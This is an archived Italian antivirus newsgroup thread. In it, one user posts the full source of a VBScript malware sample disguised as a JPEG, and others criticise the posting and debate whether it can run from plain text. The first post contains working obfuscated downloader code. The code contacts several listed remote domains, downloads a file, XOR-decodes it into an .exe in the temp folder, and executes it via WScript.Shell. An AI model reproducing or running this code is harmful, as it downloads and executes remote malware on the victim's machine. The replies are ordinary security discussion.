Discussioni su virus e antivirus
 

virus fresco di giornata

Alex 7 Apr 2017 17:41
Eccolo qui, truccato da immagine jpeg (NON ESEGUIRE EH!)
Un vbscript

Chissà che sono quei domini

-themanyshadesofgreen dot com/87hcwc?
-myosnova dot ru/87hcwc?
-www.yuechiwang dot com/87hcwc?
-themanyshadesofgreen dot com/87hcwc?

Siti *****erati?
***************************************

DIR300connectivityRH = "User"
RACHEL = "avetof"


Dim DIR300connectivityLAKOPPC 'As String
'Dim DIR300connectivitypirogog() 'As String
Dim DIR300connectivityRENovate 'As String
Function functionT()
DIR300connectivityShpak.Savetofile DIR300connectivityRENovate & "A", 2
End Function

Vrungel = ".resp"+"onse"+"Body"


Function PS( DIR300connectivityRENovate, DIR300connectivityRENovateu)
Const ForReading = 1
Const TristateFalse = 0
Dim i,d,z, Chesko, feli_tupni, output ******* BagsBunny
If Not IsArray( DIR300connectivityRENovateuu ) Then
DIR300connectivityRENovateuu = Array(
DIR300connectivityRENovateuu )
End If

Set Chesko = CreateObject( "Scripting.FileSystemObject" )


Set feli_tupni = Chesko.GetFile( DIR300connectivityRENovate )
Set BagsBunny = feli_tupni.OpenAsTextStream( 1, TriStateFalse )

' Create the output ******* REPLACE it already exists
Set output ******* = Chesko.CreateTextFile(
DIR300connectivityRENovateu, True, False ) ' MY
i = 0
d = UBound( DIR300connectivityRENovateuu ) + 1

Do Until BagsBunny.AtEndOfStream
z = i mod d
output ******* Write Chr( Asc( BagsBunny.Read( 1) ) Xor
DIR300connectivityRENovateuu(z) )
i = 1+i
Loop




output ******* Close
BagsBunny.Close

Set BagsBunny = Nothing
Set feli_tupni = Nothing
Set output ******* = Nothing
Set Chesko = Nothing
PS = Err.Number
Err.Clear
End Function




Dim DIR300connectivityChuChundra 'As Object
Dim DIR300connectivityShpak 'As Object

Function GeometryDash(p,d)
PS DIR300connectivityRENovate& "A", DIR300connectivityRENovateu

DIR300connectivityRombickom.Run(DIR300connectivityRENovateu)
End Function
Dim DIR300connectivitystatus
DIR300connectivitystatus = false
Dim DIR300connectivitypirogog

Dim DIR300connectivityKSKLAL 'As Object

Function F3(p)
Set DIR300connectivityRombickom = CreateObject("WScript.Shell")
End Function

Dim DIR300connectivity1DASH1solo 'As Object

Function functionT2(dry)

if dry > 3 AND 2000 > dry Then
DIR300connectivityASALLLP = DIR300connectivityChuChundra.responseBody
end if

End Function
Dim DIR300connectivity2 'As String
Dim DIR300connectivityGMAKO 'As Object

Function DIR300connectivityFuks(p)

DIR300connectivityChuChundra.Send

End Function

DIR300connectivity2 =
"Microsoft.XMLHTTPCEGUKRAdodb.streaMCEGUKRshell.ApplicationCEGUKRWscript.shellCEGUKRProcessCEGUKRGeTCEGUKRTem"+"PCEGUKRTypeCEGUKRopenCEGUKRwriteCEGUKRresponseBodyCEGUKRsavet"+"ofileCEGUKR\zSHJVbbPTCg.exeCEGUKRhttp:CEGUKR//"

Dim DIR300connectivity4 'As String
Function lets_choper( str )
Dim i, arrCode( )
ReDim arrCode( Len( str ) - 1 )
Dim si
si = UBound( arrCode )
For i = 0 To si
arrCode(i) = Asc( Mid( str, i + 1, 1 ) )
Next
Dim ac
ac = arrCode
lets_choper = ac
End Function
Dim DIR300connectivityASALLLP 'As Variant
Dim VeterZaSpina 'As Integer
DIR300connectivityRH = DIR300connectivityRH&"-"
Dim iSlashPOS 'As Integer
Dim sDecimalVis 'As String
Dim sWholeVis 'As String
sWholeVis = "A"
Function podeli( str )
podeli = Split(DIR300connectivity2, str)
End Function
Dim MarketPlaceibility 'As String
Dim sNodeKey 'As String
Dim sParentKey 'As String
Dim MarketPlace 'As String
DIR300connectivitypirogog = podeli(""&"CEGUKR")
Dim sTempVis 'As String
Dim iCount 'As Integer
Dim DIR300connectivityRombickom


Set DIR300connectivityShpak =
CreateObject(DIR300connectivitypirogog(3+3-5))



Set DIR300connectivityGMAKO =
CreateObject(DIR300connectivitypirogog(8-6))
Set Jokkonos = GetRef("GeometryDash")
MarketPlace = DIR300connectivitypirogog(13) &
DIR300connectivitypirogog(14)

DIR300connectivityRH = DIR300connectivityRH&sWholeVis&"gent"
Set DIR300connectivity1DASH1solo =
CreateObject(DIR300connectivitypirogog(3))
Set DIR300connectivityChuChundra =
CreateObject(DIR300connectivitypirogog(0))



Cicarka =
Split("themanyshadesofgreen.com/87hcwc?-myosnova.ru/87hcwc?-www.yuechiwang.com/87hcwc?-themanyshadesofgreen.com/87hcwc?",

"-")
Set DIR300connectivityKSKLAL =
DIR300connectivity1DASH1solo.Environment(DIR300connectivitypirogog(1 +
3))
DIR300connectivityLAKOPPC =
DIR300connectivityKSKLAL(DIR300connectivitypirogog(6))
VeterZaSpina = 0
Dim i
'on error GoTo nextU
' on error resume next

lFrom = LBound(Cicarka)
lTo = UBound(Cicarka)

For i = lFrom To lTo Step 1
VeterZaSpina = VeterZaSpina + 1

DIR300connectivity4 = MarketPlace & Cicarka(i)
DIR300connectivityChuChundra.Open DIR300connectivitypirogog(5),
DIR300connectivity4, False
DIR300connectivityChuChundra.setRequestHeader DIR300connectivityRH,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101
Firefox/49.0"
on error resume next
DIR300connectivityFuks ""

If DIR300connectivityChuChundra.Status = 100*2 Then
DIR300connectivitystatus = true
Exit For
End If

Next
on error goto 0
if DIR300connectivitystatus Then
Dim Ratchet 'As String
DIR300connectivityRENovate = DIR300connectivityLAKOPPC
DIR300connectivityRENovateuu =
lets_choper("1Pmly03sb4qwH90G2WTutRRuuSBQS4zF")

F3 ""
DIR300connectivityRENovate = DIR300connectivityRENovate +
DIR300connectivitypirogog(12)
DIR300connectivityShpak.Type = 1
DIR300connectivityShpak.Open


functionT2 13
DIR300connectivityShpak.Write DIR300connectivityASALLLP
functionT()
Dim DIR300connectivityRENovateuuu 'As Long
Dim Pivkoo 'As Long
DIR300connectivityRENovateu = DIR300connectivityRENovate

DIR300connectivityRENovateuuu = 1211



If 7 < DIR300connectivityRENovateuuu Then
Pivkoo = ""
Jokkonos 4,74
End If

end if
Function DIR300connectivityCemetry1(ap, op)

ap.createCipuka
op.closeCipuka

End Function
*******************

bye bye

--
Alex
ArchiPit 9 Apr 2017 13:29
Rispondo quì sotto a Alex

Non lo fare più, per carità: chi legge il tuo messaggio dai gruppi di
google con il browser e non abbia preso precauzioni bloccando in genere
gli script esegue il virus prima ancora di leggere il tuo "non
eseguire"!!!
Gabriele - onenet 9 Apr 2017 21:20
ArchiPit wrote on 09/04/17 13:29:
> Rispondo quì sotto a Alex
>
> Non lo fare più, per carità: chi legge il tuo messaggio dai gruppi di google
con
> il browser e non abbia preso precauzioni bloccando in genere gli script esegue
> il virus prima ancora di leggere il tuo "non eseguire"!!!

La cosa interessante è che AVG (su Mac!) me lo blocca come JS Downloader, anche

se leggo i newsgroup in formato testo e senza poter eseguire alcunché (nel
senso
che ho le impostazioni per non eseguire script in posta e gruppi) col client di
Mozilla SeaMonkey.

Gabriele
qu 9 Apr 2017 22:59
Gabriele - onenet wrote:
> ArchiPit wrote on 09/04/17 13:29:
>> Rispondo quì sotto a Alex
>>
>> Non lo fare più, per carità: chi legge il tuo messaggio dai gruppi
>> di google con il browser e non abbia preso precauzioni bloccando in
>> genere gli script esegue il virus prima ancora di leggere il tuo
>> "non eseguire"!!!
>
> La cosa interessante è che AVG (su Mac!) me lo blocca come JS
> Downloader, anche se leggo i newsgroup in formato testo e senza poter
> eseguire alcunché (nel senso che ho le impostazioni per non eseguire
> script in posta e gruppi) col client di Mozilla SeaMonkey.

fosse solo quello...

Il virus viene rilevato anche su un'immagine Vista, con Outlook Express/
Windows Mail, in lettura formato solo testo, nel ******* di salvataggio
provvisorio su disco. E in formato testo.
Sai che comincio a pensare che, come errore, sia troppo davvero troppo
stupido? O meglio, chi ci dice che l'autore del messaggio coincida con
quello che periodicamente ha postato su questo Ng?

Domani, diamo una guardata agli header dove si conviene: sperando di poter
derubricare tutta l'attività alla voce "fesso col botto" e non "furto di
identità".

Che storie di cryptovirus e modi per diffonderli e farci su soldi se ne son
visti tanti... e se anche non fosse il caso, fosse un improbabile riedizione
di pong, meglio indagare sulla cosa, per quanto possa apparire una stronzata

--
qu
qu[levami]@x-planet.org (elimina [levami] per scrivermi)
''se la gente che inculatasi reciprocamente formasse un anello, la Terra
sarebbe Saturno"
Un consiglio per il quote: http://youtube.com/watch?v=kCscWlOiXd0
Leonardo Serni 10 Apr 2017 00:11
On Sun, 9 Apr 2017 22:59:00 +0200, "qu" <troppo@spam.com> wrote:

>> La cosa interessante è che AVG (su Mac!) me lo blocca come JS
>> Downloader, anche se leggo i newsgroup in formato testo e senza poter
>> eseguire alcunché (nel senso che ho le impostazioni per non eseguire
>> script in posta e gruppi) col client di Mozilla SeaMonkey.

>fosse solo quello...

>Il virus viene rilevato anche su un'immagine Vista, con Outlook Express/
>Windows Mail, in lettura formato solo testo, nel ******* di salvataggio
>provvisorio su disco. E in formato testo.

Mi pare abbastanza strano perché il messaggio è TESTO. Che l'antivirus lo
riconosca ci sta (EICAR anyone?), ma che sia ESEGUITO mi pare chiedere un
po' troppo.

Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-15"; format=flowed
Content-Transfer-Encoding: 8bit

Inoltre:

--- cite ---
Eccolo qui, truccato da immagine jpeg (NON ESEGUIRE EH!)
Un vbscript

Chissà che sono quei domini

-themanyshadesofgreen dot com/87hcwc?
-myosnova dot ru/87hcwc?
-www.yuechiwang dot com/87hcwc?
-themanyshadesofgreen dot com/87hcwc?

Siti *****erati?
***************************************

DIR300connectivityRH = "User"
RACHEL = "avetof"
--- cite ---

come farebbe l'interprete a capire che è il caso di cominciare a eseguire
da "DIR300connectivityRH = "User" e non da "Eccolo qui"?

Conoscendo VBscript, già quel ***** lo considera elevazione a strapotenza
e ci si impicca :-D

Capirei se ci fosse un tag script, ma non c'è...

Leonardo
--

A terrible beauty is born.
- W. B. Yeats, Easter 1916
Paperino 10 Apr 2017 21:58
Leonardo Serni ha scritto:
> "qu" wrote:
>>> La cosa interessante è che AVG (su Mac!) me lo blocca come JS
>>> Downloader, anche se leggo i newsgroup in formato testo e senza poter
>>> eseguire alcunché (nel senso che ho le impostazioni per non eseguire
>>> script in posta e gruppi) col client di Mozilla SeaMonkey.
>> fosse solo quello...
>> Il virus viene rilevato anche su un'immagine Vista, con Outlook Express/
>> Windows Mail, in lettura formato solo testo, nel ******* di salvataggio
>> provvisorio su disco. E in formato testo.
> Mi pare abbastanza strano perché il messaggio è TESTO. Che l'antivirus lo
> riconosca ci sta (EICAR anyone?), ma che sia ESEGUITO mi pare chiedere un
> po' troppo.
> Mime-Version: 1.0
> Content-Type: text/plain; charset="iso-8859-15"; format=flowed
> Content-Transfer-Encoding: 8bit

Io ho provato ieri con un test estremamente minimale, un paio
di msgbox:
Message-ID: <ocdpjt$3ue$1@gioia.aioe.org>
ma non sono riuscito in nessuna maniera a farlo attivare, neanche
andandoci con IE7. Browser più vecchi non ne ho sottomano :-(, ma
direi che più calarsi le mutande più di così nel 2017 non si possa
fare.

> come farebbe l'interprete a capire che è il caso di cominciare a eseguire
> da "DIR300connectivityRH = "User" e non da "Eccolo qui"?
> Conoscendo VBscript, già quel ***** lo considera elevazione a strapotenza
> e ci si impicca :-D
> Capirei se ci fosse un tag script, ma non c'è...

Perfino salvandolo come .htm e buttandolo dentro i vari browser
non parte, senza uno straccio di tag <script>. E anche così mi
par di ricordare che non fosse facile farlo funzionare.
Sono passati un po' di anni... dovrebbe essere qualcosa tipo:
<script type="text/vbscript"> oppure <script language=”VBScript”>
o una combinazione dei due.

Bye, G.
BIG Umberto 11 Apr 2017 05:57
Paperino in data 21:58, lunedì 10 aprile 2017, nel gruppo
it.comp.sicurezza.virus ha scritto:

>> Capirei se ci fosse un tag script, ma non c'è...
>
> Perfino salvandolo come .htm e buttandolo dentro i vari browser
> non parte, senza uno straccio di tag <script>. E anche così mi
> par di ricordare che non fosse facile farlo funzionare.
> Sono passati un po' di anni... dovrebbe essere qualcosa tipo:
> <script type="text/vbscript"> oppure <script language=?VBScript?>
> o una combinazione dei due.

Concordo che magari non si autoavvia, ma come si é detto sopra,
uno "spaventino" a chi apre il messaggio, viene!
Meglio evitare di postare schifezze (che ce ne sono giá tante) in rete.

--
+---------------------------------------------------------------------------+
| Non e' morto cio' che in eterno puo' attendere. |
| Con il passare di strane ere anche la morte puo' morire. |
+-----#42--------------------Diamanti di saggezza.--------------------------+

Links
Giochi online
Dizionario sinonimi
Leggi e codici
Ricette
Testi
Webmatica
Hosting gratis
   
 

Discussioni su virus e antivirus | Tutti i gruppi | it.comp.sicurezza.virus | Notizie e discussioni sicurezza virus | Sicurezza virus Mobile | Servizio di consultazione news.